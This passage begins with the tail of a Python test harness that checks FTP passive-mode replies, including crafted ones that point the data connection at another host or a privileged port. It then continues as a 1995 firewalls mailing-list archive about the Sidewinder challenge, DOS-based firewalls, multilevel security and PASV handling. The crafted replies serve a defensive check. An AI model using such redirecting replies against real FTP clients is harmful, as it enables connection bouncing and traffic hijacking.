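        "227 Entering Passive Mode (192,0,2,10,19,137)",    # normal: port 19*256+137 = 5001
        "227 Entering Passive Mode (198,51,100,7,19,137)",  # points at a different host
        "227 Entering Passive Mode (192,0,2,10,0,21)",      # privileged port
        "227 Entering Passive Mode (300,0,2,10,19,137)",    # malformed field
    ):
        result = passive_exchange(peer, reply)
        print("\n".join(result["transcript"]))
        print("  ->", "ALLOW" if result["allowed"] else "DENY", "-", result["reason"])
```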
From firewalls-owner Thu Aug 10 12:00:47 1995
From: Rick Smith
Message-Id: <199508101828.NAA26177@shade.sctc.com>
Subject: Sidewinder Rumor Control (sorry!)
To: firewalls@greatcircle.com
Date: Thu, 10 Aug 1995 13:28:31 -0500 (CDT)
Cc: smith@sctc.com

Sorry folks, I was misinformed. We have _never_ sent out a Sidewinder jacket to a Challenge participant, not even for the guy who came so close. The powers that were at the time decided against it after all.

If you see someone in a Sidewinder jacket, it's probably Earl or some other member of the team who set up the Challenge. Please direct comments to us and not to the list unless you really require the attention of the Firewalls community.

I thank Brent and everyone for their patience.

Rick.
smith@sctc.com    secure computing corporation

From firewalls-owner Thu Aug 10 12:10:26 1995
From: Rick Smith
Message-Id: <199508101817.NAA26039@shade.sctc.com>
Subject: Re: s[id]ewinder
To: mjr@iwi.com
Date: Thu, 10 Aug 1995 13:17:39 -0500 (CDT)
Cc: smith@sctc.com (Rick Smith), firewalls@greatcircle.com
In-Reply-To: <199508101428.KAA13372@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 10, 95 10:28:54 am

> That's one of the hazards of doing bogus challenges. My heart
> bleeds.

I wasn't looking for sympathy, just observing what I found to be the most surprising property of the experience. I think it's an interesting commentary on The World Out There that customers are more impressed by the Sidewinder Challenge as evidence of effective security than they are in the SMG's formal assurance.
I don't know what the actual ratio is of cost-per-bugs-found for each, but they're both steep. Formal assurance finds lots more bugs, but it costs more, too. Really represents both ends of the security assurance spectrum, eh?

Rick.
smith@sctc.com    secure computing corporation

From firewalls-owner Thu Aug 10 12:33:06 1995
From: Bob Allison
Date: Thu, 10 Aug 1995 13:40:31 -0400
To: firewalls@greatcircle.com
Subject: Secure Dialup

I have seen this topic discussed a few times, but have not seen the kind of answer I am looking for, so... (don't flame me if I missed something, just kindly point me to the source of the error)

I have been instructed to get some in-bound modems available. The main use of these modems will be for employees to access their network files from either home or a customer site. This means I will need NFS, which also means that these modems must be inside the firewall.

Assuming that several of you experts (and the rest of you too) have installed a secure modem pool, I would like some pointers: which products are good, which are not so good, difficulty to set up and administer, etc. Since I do not have any information at present, I would also appreciate contact information if possible.

To avoid a lot of extra bandwidth, please reply directly to me. As I make my summary for presentation to management, I will also post a copy to the list (probably about a week or two from now).

Thanks in advance to everyone for the help!

--
To contact me (in order of decreasing reliability):
E-Mail: bob.allison@scitexdpi.com
Phone Mail: +1 513 259 3629 (I'm often out helping users)
FAX "Mail": +1 513 259 3291
Snail Mail: Bob Allison, SCITEX Digital Printing, Inc., 3100 Research Blvd., Dayton, OH 45420-4099

From firewalls-owner Thu Aug 10 12:33:57 1995
From: David Miller
Date: Thu, 10 Aug 1995 14:48:35 -0400 (EDT)
Subject: Re: Multilevel Security is good for firewalls
To: Chris Brenton
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9508101408.AA16324@herne.newsedge.com>

On Thu, 10 Aug 1995, Chris Brenton wrote:
> In reply to:
> > There's an outfit that builds a firewall running on DOS.
> > When I first heard of it, I thought the idea was ridiculous, but
> > in retrospect it's actually a really clever idea! There's no sendmail
> > to worry about ("multitasking? Huh?") no network daemons, no NFS,
> > no spending hours vetting your UNIX config to see what nonsense

No interrupts, no 32 bit programming, no memory protection from errant pointers....

> > the vendor left there, etc, etc. If the firewall process crashes,
> > the system instantly becomes inoperative. Pretty clever, really.
> > Basically, you accept the fact that the firewall is a special purpose
> > machine and treat it accordingly.

I'm not opposed to the theory, just wondering if it's necessary to stoop that low. One of the advantages of Unix is the environment it gives the proxies to run in - memory protection among the different processes, a preemptive scheduler, built in robust tcp, etc. etc., all of which are a lot of work to recreate. Unless, of course, you like programming in a microcode environment?

> > I'd rather run DOS than B1, and frankly, I suspect a DOS
> > box running a single program that just manages IP firewalling is a
> > hell of a lot harder to break into than a CMW or some kind of UNIX
> > box running B1. (and a little cheaper and easier to manage)

True, if you're talking about a packet filter that is a single process deciding in a single threaded manner whether to forward a packet or not. I'm not sure the fwtk style proxies map onto this model very well, whether the transparent breed or not.

> Any capacity or speed specs on this?

Padgett? You've done this kind of stuff already, right?

--- David
----------------------------------------------------------------------------
It's *amazing* what one can accomplish when one doesn't know what one can't do!
From firewalls-owner Thu Aug 10 13:24:17 1995
From: Brad.Powell@Eng.Sun.COM (Brad Powell)
Date: Thu, 10 Aug 1995 11:18:11 -0700
Message-Id: <199508101818.LAA03461@olympics.Eng.Sun.COM>
To: mjr@iwi.com, bdboyle@maverick.erenj.com
Subject: Re: s[id]ewinder
Cc: firewalls@greatcircle.com

> From firewalls-owner@GreatCircle.COM Thu Aug 10 10:59:37 1995
> From: "Bryan D. Boyle"
> > Subject: Re: s[id]ewinder

Bryan writes:
> of course not. The fact that no one has publicly
> broken it indicates:
>
> 1) no one really cares and has other things to do with limited time.
>
> 2) The challenge is that there really is no message, and finding that out
>    is the key
>
> 3) the people you are trying to protect against aren't interested in proving
>    a company's marketing claims.
>
> Not being broken does not, ipso facto, indicate that the system is secure.
> It can also indicate that there was not a concerted effort to do so.

I'd add a fourth bullet to this list.

4) The crackers are not advertising that they know how to break into since it's in *their* best interest to get _everyone_ using so that some "interesting" sites will be vulnerable.

No I'm not posting FUD :-) What I'm trying to say is that you can't prove something "secure" by these methods, only prove it's insecure. It would take a code review to prove secure, and then only if the reviewers knew exactly what they were doing and were infallible. Pretty high hurdle to jump eh...

I would at least like to see statements (for any products; I'm not limiting or picking on any particular product here) along the lines of "PRODUCT has been tested against the following attacks and proven to not be susceptible to them" (and additionally detected and logs the attack)

=======================================================================
Brad Powell : brad.powell@Sun.COM
Sr. Network Security Consultant
SunNetworks, Sun Microsystems Inc.
=======================================================================
The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc.
=======================================================================

From firewalls-owner Thu Aug 10 13:39:03 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Thu, 10 Aug 95 15:29:44 -0400
Message-Id: <9508101929.AA12845@uvs1.orl.mmc.com>
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Multiprocessor firewalls

> Firewalls are *NOT* general purpose computing engines. Padgett
> has suggested building firewalls out of 386SXs: one for each proxy
> service!
Bit of a caveat here. Mention was made of DOS. The nice thing about DOS is that means exist to set it aside when the application begins and you can use "something else". Windows does this. The SERVER.EXE that starts Novell Netware from a DOS partition does this. For that you do not even need DOS, the BIOS provides all of the hooks you need - have written a number of programs this way and this is how the original "Flight Simulator" from Microsoft ran. Warmly, Padgett From firewalls-owner Thu Aug 10 13:40:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06937 for firewalls-outgoing; Thu, 10 Aug 1995 12:27:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06896 for ; Thu, 10 Aug 1995 12:26:57 -0700 Received: from gateway.damark.com(204.17.145.230) by miles via smap (V1.3) id sma006847; Thu Aug 10 12:26:36 1995 Received: by gateway.damark.com; id OAA05122; Thu, 10 Aug 1995 14:21:39 -0500 Received: from sco.damark.com(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme005120; Thu, 10 Aug 95 14:21:16 -0500 Received: by damark.com (5.65/1.2-eef) id AA04094; Thu, 10 Aug 95 14:20:09 -0500 Message-Id: <9508101920.AA04094@damark.com> From: "william.wells" To: FIREWALLS Subject: FW: Sample Security Policy? Date: Thu, 10 Aug 95 14:16:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail from Alan Dowd contained the following: NOT! The security policy can be as simple as "all that is not specifically permitted is forbidden." It's not the policy, it's how you enforce it that _may_ need protection. ... What advantage does this give a potential intruder? What advantage does it give the user? the administrator? (Rhetorical questions; solutions are left to the student.) >> To which I write: I concur. The policy that we have deals with what users are and aren't supposed to do and is pretty much basic stuff. 
The specific hooks, tracking, and traps we have and/or have added to monitor and enforce the policy. On occasion, I might discuss the user policy but it takes much more for me to discuss the latter. However, if you've never written or seen even a basic policy aimed at users, writing one can be intimidating. My experience is that there are frequently 2 related documents: one for users and one for administrators; the difference is that one is conceptual ("passwords must be 6 or more characters") and one is procedural ("set this value to ... in this file"). From firewalls-owner Thu Aug 10 13:57:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11168 for firewalls-outgoing; Thu, 10 Aug 1995 13:18:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11146 for ; Thu, 10 Aug 1995 13:18:31 -0700 Received: from milkyway.com(198.53.167.2) by miles via smap (V1.3) id sma011104; Thu Aug 10 13:18:17 1995 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id QAA08547; Thu, 10 Aug 1995 16:18:51 -0400 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id QAA24274 for ; Thu, 10 Aug 1995 16:14:30 -0400 Received: by metis.milkyway.com (8.6.9/BSDI-Client) id QAA15556; Thu, 10 Aug 1995 16:27:00 -0400 To: firewalls@greatcircle.com Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: s[id]ewinder Date: 10 Aug 1995 16:26:59 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 17 Distribution: milkyway Message-ID: <40dq2j$f62@metis.milkyway.com> References: <9508101148.ZM18768@maverick.erenj.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9508101148.ZM18768@maverick.erenj.com>, Bryan D. Boyle wrote: >1) no one really cares and has other things to do with limited time. 
> >2) The challenge is that there really is no message, and finding that out > is the key I suspect #2. How do I know there is even a network behind the firewall? Or that the firewall ever passes *ANY* data through it? It isn't hard to protect an Atari 800 with a BNC connector taped to the side. -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Thu Aug 10 14:39:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13069 for firewalls-outgoing; Thu, 10 Aug 1995 14:00:44 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13030 for ; Thu, 10 Aug 1995 14:00:38 -0700 Received: from news.ti.com(192.94.94.33) by miles via smap (V1.3) id sma013021; Thu Aug 10 14:00:34 1995 Received: from tlsun5a.itg.ti.com ([128.247.21.237]) by gate.ti.com (8.6.12/) with ESMTP id PAA18345 for ; Thu, 10 Aug 1995 15:59:27 -0500 Received: from dsk92.itg.ti.com (dsk92.itg.ti.com [128.247.187.97]) by tlsun5a.itg.ti.com (8.6.12/8.6.11) with ESMTP id PAA27969 for ; Thu, 10 Aug 1995 15:59:27 -0500 Received: (from bill@localhost) by dsk92.itg.ti.com (8.6.9/8.6.9) id PAA04754 for Firewalls@GreatCircle.COM; Thu, 10 Aug 1995 15:58:51 -0500 From: Bill Petersen Message-Id: <199508102058.PAA04754@dsk92.itg.ti.com> Subject: Re: Encripted ftp connections To: Firewalls@GreatCircle.COM Date: Thu, 10 Aug 1995 15:58:51 -0600 (CDT) In-Reply-To: <199508101934.MAA07537@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Aug 10, 95 12:34:42 pm Company: Texas Instruments Inc. 
Address: 6550 Chase Oaks Blvd., MS 8467, Plano, TX 75023 Phone: 214-575-5437 FAX: 214-575-4853 Reply-To: brp@ti.com X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 2542 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Atkinson-K@smtpgw.nctsw.navy.mil > Date: Thu, 10 Aug 1995 09:54:40 -0400 > Subject: Encripted ftp connections > > Lyndon David wrote: > > >I have been tasked with setting up an ftp server to > >communicate with a handfull of business partners. We > >wish to have the ability for our partners to be able > >to send and retrieve files from our server. Due to the > >nature of the data the data must be encripted as it passes > >over the Internet and stong authentication must be used > >when they connect. > > >This is a commercial project and the data will cross > >International bounderies, for this reason I do not want > >to use encription technology such as pgp as some of the > >countries will have problems with this. > > >Does anyone know of a hardware solution that can operate > >between one local machine and 5 or 6 remote machines? > > The Message Security Protocol (don't recall the International Standard name > for it) will provide the strong authentication and one to many requirements > you have, but only for messages. In an international environment, you will > have problems with just about any encryption capability you choose. > > >If encription of the data before transmission is mandated > >what commercial encription can be used that will be > >acceptable across International boarders and can anyone > >think of a method where if someone forgot to encript the > >data before transmission this would be caught and the > >transfer stopped? > > There are Guards that will be coming available that will prevent > unencrypted information from leaving an enclave and passing over a Network. > - ------------------------------ There is a box put out by a company named Semaphore called an Neu - network encryption unit. 
It will do just what you want and is approved for export to several countries. You can, but ip/hwdr addr choose whether host A will talk to host B encrypted or in the clear. Semaphore Communications Corporation 2040 Martin Avenue, Santa Clara, CA 95050, FAX 408-980-7769, Dave Thomsen 408-980-7770 (name/number is 1 yr old) thomsen@netcom.com Regards, Bill ---------------------------------------------------------------------------- Bill Petersen email: brp@ti.com Enterprise Computing Provisioning voice: 214-575-5437 Texas Instruments, Inc. Plano Texas fax: 214-575-4853 ---------------------------------------------------------------------------- From firewalls-owner Thu Aug 10 15:00:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11052 for firewalls-outgoing; Thu, 10 Aug 1995 13:16:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11015 for ; Thu, 10 Aug 1995 13:16:29 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma010998; Thu Aug 10 13:15:51 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28675 for ; Thu, 10 Aug 1995 15:22:02 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28667 for ; Thu, 10 Aug 1995 15:22:00 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA20276; Thu, 10 Aug 1995 15:14:37 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA29388; Thu, 10 Aug 1995 15:14:36 -0500 From: Rick Smith Message-Id: <199508102014.PAA29388@shade.sctc.com> Subject: Re: Multilevel Security is good for firewalls To: firewalls@greatcircle.com Date: Thu, 10 Aug 1995 15:14:36 -0500 (CDT) Cc: smith@sctc.com (Rick Smith) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 
7bit Content-Length: 1315 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus writes: > There's an outfit that builds a firewall running on DOS. >When I first heard of it, I thought the idea was ridiculous, but >in retrospect it's actually a really clever idea! There's no sendmail >to worry about ("multitasking? Huh?") no network daemons, ... But outsiders must access these services somehow or other. If the outsiders can send in data, then there are risks of bugs like the httpd overrun hack or Morris' finger. On a DOS system, such a bug immediately gives the attacker your server machine, firewall or not. On Unix the guy at least has to bust down a few more barriers. On a system with multilevel security or type enforcement, they face a pretty serious barrier. I'm not confident that state of the art server software will always be bug free or written with a trained eye towards security issues. So the "trustworthy" version of a service is always going to lag the market overall. MLS and TE are tools that let us use existing implementations with less risk. I'm not sure if this places these servers "on the firewall" or on some other unspecified element of the controlled perimeter. This discussion is leading in directions that make it hard to tell what security objective a "firewall" is supposed to achieve. Rick. 
smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 15:04:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14855 for firewalls-outgoing; Thu, 10 Aug 1995 14:44:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14816 for ; Thu, 10 Aug 1995 14:43:54 -0700 Received: from gatekeeper2.mcimail.com(192.147.45.10) by miles via smap (V1.3) id sma014810; Thu Aug 10 14:43:14 1995 Received: from mailgate2.mcimail.com (mailgate2.mcimail.com [166.38.40.100]) by gatekeeper2.mcimail.com (8.6.12/8.6.10) with SMTP id VAA08973; Thu, 10 Aug 1995 21:41:22 GMT Received: from mcimail.com by mailgate2.mcimail.com id ae26094; 10 Aug 95 21:39 WET Date: Thu, 10 Aug 95 16:38 EST From: "Kevin J. McMahon" <0003557428@mcimail.com> To: Firewalls Subject: Re: s[id]ewinder Message-Id: <35950810213853/0003557428DC4EM@MCIMAIL.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus Ranum wrote: > >Question: > Will SCC pay out if the message is broadcast REGARDLESS of the >means by which it is discovered? Careful how you answer. :) > Answer... there are no technical solutions for social engineering. From firewalls-owner Thu Aug 10 15:11:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11167 for firewalls-outgoing; Thu, 10 Aug 1995 13:18:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11120 for ; Thu, 10 Aug 1995 13:18:29 -0700 Received: from scifi.emi.net(204.181.45.10) by miles via smap (V1.3) id sma011103; Thu Aug 10 13:18:08 1995 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id QAA13971; Thu, 10 Aug 1995 16:16:30 -0400 Date: Thu, 10 Aug 1995 16:16:23 -29900 From: Nick Simicich Subject: Re: Netscape's FTP through a Firewall To: "Charles L. 
Hutson" cc: firewalls@GreatCircle.COM In-Reply-To: <9508101528.AA21060@nexus.ptech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 10 Aug 1995, Charles L. Hutson wrote: > I'm having a problem using Netscape to FTP through my Firewall-1 firewall. > I've done quite a bit of testing and research and have figured out that > its because Netscape's version of ftp adheres to the specifications of > RFC 1579. This RFC states that instead of doing a PORT command to tell > the ftp server what port to open a data connection on, it does a PASV > command. The following quote is from the above RFC: > > Fortunately, the necessary mechanisms already exist in the protocol. > If the client sends a PASV command, the server will do a passive TCP > open on some random port, and inform the client of the port number. > The client can then do an active open to establish the connection. > > This is the part that confuses me. If the server is going to inform > my client of the port number "on some random port", 1) How am I going > to know which port to listen on to get this critical information? It > seems like my ftp client would have to be frantically scanning the > entire range above 1024 to get this information. 2) Isn't > this going to force me to leave the entire range above 1024 wide open > in my firewall configuration? The reply to the pasv message is of a parsable format. Here is a log of such a session. Numbered lines are from the server. -=-=-=-=- user anonymous 331 Guest login ok, send e-mail address as password. pass njs@scifi 230 Guest login ok, access restrictions apply. pasv 227 Entering Passive Mode (127,0,0,1,6,222) -=-=-=-=- This tells me that I should initiate the next data connection to 127.0.0.1, port 1758, The 6 is the first octet of the port number, and the 222 is the second octet, in network order. 
So the client knows exactly which ip address and port to open the connection to. This is done so that I, as a client, can open the connection, and eliminates the usual FTP problem of needing to allow incoming connections to high ports that you run into when you use the ports command. It also allows netscape to easily work with IP Masquerading at the client end. > As it stands, I can't FTP through Netscape because my firewall blocks > that incomming random packet. Can anyone provide any suggestions. It is more likely that your firewall only allows outgoing connections to certain ports, and not to the range of ports above 1024. -- Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Thu Aug 10 15:25:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09809 for firewalls-outgoing; Thu, 10 Aug 1995 13:06:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09747 for ; Thu, 10 Aug 1995 13:06:10 -0700 From: elivermore@gw.lsli.com Received: from lsli.sccsi.com(198.65.130.22) by miles via smap (V1.3) id sma009690; Thu Aug 10 13:05:53 1995 Received: by gw.lsli.com (AIX 3.2/UCB 5.64/4.03) id AA10750; Thu, 10 Aug 1995 14:58:48 -0500 Received: by gw.lsli.com via smwrap (PORTUS 2.0) id smwrapOvsAK1; Thu Aug 10 14:57:44 1995 id AA18037; Thu, 10 Aug 1995 14:58:23 -0500 Date: Thu, 10 Aug 95 15:01:40 PDT Subject: Announce: change in LSLI/PORTUS url To: firewalls@greatcircle.com X-Mailer: Chameleon ARM_55, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is to inform everyone that the URL for our web site with information about the PORTUS firewall and our on-line firewall tutorial has changed. the new URL is http://www.lsli.com Its short. Its sweet. Its so 90's. 
------------------------------------- Ellana Livermore Livermore Software Laboratories, Inc. 713-496-1580 800-240-5754 FAX: 713-496-6356 elivermore@gw.lsli.com http://www.lsli.com Most people don't know there are angels whose only job is to make sure you don't get too comfortable & fall asleep & miss your life. (Brian Andreas) -------------------------------------------------- 08/10/95 15:01:40 From firewalls-owner Thu Aug 10 15:31:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA16291 for firewalls-outgoing; Thu, 10 Aug 1995 15:10:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA16273 for ; Thu, 10 Aug 1995 15:10:14 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma016228; Thu Aug 10 15:10:09 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA13354; Thu, 10 Aug 95 18:01:22 -0400 Date: Thu, 10 Aug 95 18:01:21 -0400 Message-Id: <9508102201.AA13354@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Intel firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David rites: >> Any capacity or speed specs on this? >Padgett? You've done this kind of stuff already, right? In my experience, the limiting factor is the capacity of the NICs, even a speedy 286 can handle a single process. Might want to check out KarlBridge, it masks the O/S. Not sure about DrawBridge. As for 32bit et all, nothing stopping you from using it, the iapx chip just starts in Real mode, doesn't need to stay there. Netware is 32bit. In fact Novell Netware might be a good measure of what a PC is capable of though it has an incredible amount of overhead, anything less is faster (as I recall a 486/66 tends to get slower around 100 users but a 386-16 can handle 10 just fine. 
Warmly, Padgett From firewalls-owner Thu Aug 10 15:38:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14342 for firewalls-outgoing; Thu, 10 Aug 1995 14:32:50 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14318 for ; Thu, 10 Aug 1995 14:32:46 -0700 Received: from databus.databus.com(198.186.154.34) by miles via smap (V1.3) id sma014314; Thu Aug 10 14:32:24 1995 Date: Thu, 10 Aug 95 17:31 EDT Message-ID: <9508101731.AA26405@databus.databus.com> From: Barney Wolff To: clh@ptech.com (Charles L. Hutson), firewalls@greatcircle.com Subject: Re: Netscape's FTP through a Firewall Content-Length: 1574 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: clh@ptech.com (Charles L. Hutson) > Date: Thu, 10 Aug 95 11:27:18 EDT > > Fortunately, the necessary mechanisms already exist in the protocol. > If the client sends a PASV command, the server will do a passive TCP > open on some random port, and inform the client of the port number. > The client can then do an active open to establish the connection. > > This is the part that confuses me. If the server is going to inform > my client of the port number "on some random port", 1) How am I going > to know which port to listen on to get this critical information? It > seems like my ftp client would have to be frantically scanning the > entire range above 1024 to get this information. 2) Isn't > this going to force me to leave the entire range above 1024 wide open > in my firewall configuration? The "random port" is the port the server picks to listen on (ie, the passive open). The server informs the client on the control connection, which is already set up. Using PASV makes it hard to put the *server* behind a firewall, because the server will be listening to random port numbers at various times. 
But it makes it much easier to put the *client* behind a firewall, because both the control and data connections are initiated by the client - so the firewall can block connections initiated from outside the firewall while allowing those from inside out. And, of course, a "stateful" filter that looks at the PORT/PASV info on the control connection can do the right thing for the data connection. Barney Wolff From firewalls-owner Thu Aug 10 15:47:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10651 for firewalls-outgoing; Thu, 10 Aug 1995 13:10:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10425 for ; Thu, 10 Aug 1995 13:09:59 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma009993; Thu Aug 10 13:07:40 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28108 for ; Thu, 10 Aug 1995 15:13:51 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28104 for ; Thu, 10 Aug 1995 15:13:51 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA19950; Thu, 10 Aug 1995 15:06:26 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA29045; Thu, 10 Aug 1995 15:06:24 -0500 Date: Thu, 10 Aug 1995 15:06:24 -0500 From: Rick Smith Message-Id: <199508102006.PAA29045@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Multilevel Security is good for firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding the exchange: >> There's an outfit that builds a firewall running on DOS. >Any capacity or speed specs on this? Would it be too much to ask something like, "What kinds of attacks is this thing supposed to block, and what does it let through?" 
Like, "It's almost as fast at forwarding application level attacks as a low end filtering router." Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 16:00:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18156 for firewalls-outgoing; Thu, 10 Aug 1995 15:38:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18101 for ; Thu, 10 Aug 1995 15:37:56 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma018033; Thu Aug 10 15:36:53 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id RAA04415 for ; Thu, 10 Aug 1995 17:43:11 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id RAA04411 for ; Thu, 10 Aug 1995 17:43:10 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id RAA26818; Thu, 10 Aug 1995 17:35:45 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA02775; Thu, 10 Aug 1995 17:35:44 -0500 Date: Thu, 10 Aug 1995 17:35:44 -0500 From: Rick Smith Message-Id: <199508102235.RAA02775@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: s[id]ewinder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brad Powell writes: >What I'm trying to say that you can't prove something "secure" by these >methods, only prove its insecure. >It would take a code review to prove secure, and then only if the reviewers >knew exactly what they were doing and were infalable. Pretty high hurdle >to jump eh... Take a look at the Orange Book A1 requirements. That's about the closest I've ever seen to something that "proves secure." If you look closely you realize it only does part of the job, yet it goes miles beyond code review. But it's so hard to do that the resulting system lags the technology by the time it hits the field. 
>I would at least like to see statements (for any products; I'm not limiting >or picking on any particular product here) along the lines of >"PRODUCT has been testd against the following attacks and proven to not >be suseptable to them" (and additionally detected and logs the attack) A variant of the "penetrate'n'patch" methodology, but relying on reported penetration techniques. This is OK for ensuring that old holes are patched, but it isn't proactive. The reason for using strong measures (type enforcement or MLS) is to have something to backstop the system if the first line of defense (efficient reactive bugfixing) isn't enough. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 16:06:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09405 for firewalls-outgoing; Thu, 10 Aug 1995 13:01:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09355 for ; Thu, 10 Aug 1995 13:00:57 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma009336; Thu Aug 10 13:00:46 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA04080; Thu, 10 Aug 1995 12:54:44 -0700 Received: from milkyway.com(198.53.167.2) by mycroft via smap (V1.3mjr) id sma004060; Thu Aug 10 12:54:17 1995 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id PAA08496; Thu, 10 Aug 1995 15:58:57 -0400 Received: from metis.milkyway.com (rootmcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id PAA23838; Thu, 10 Aug 1995 15:53:57 -0400 Received: from metis.milkyway.com by metis.milkyway.com 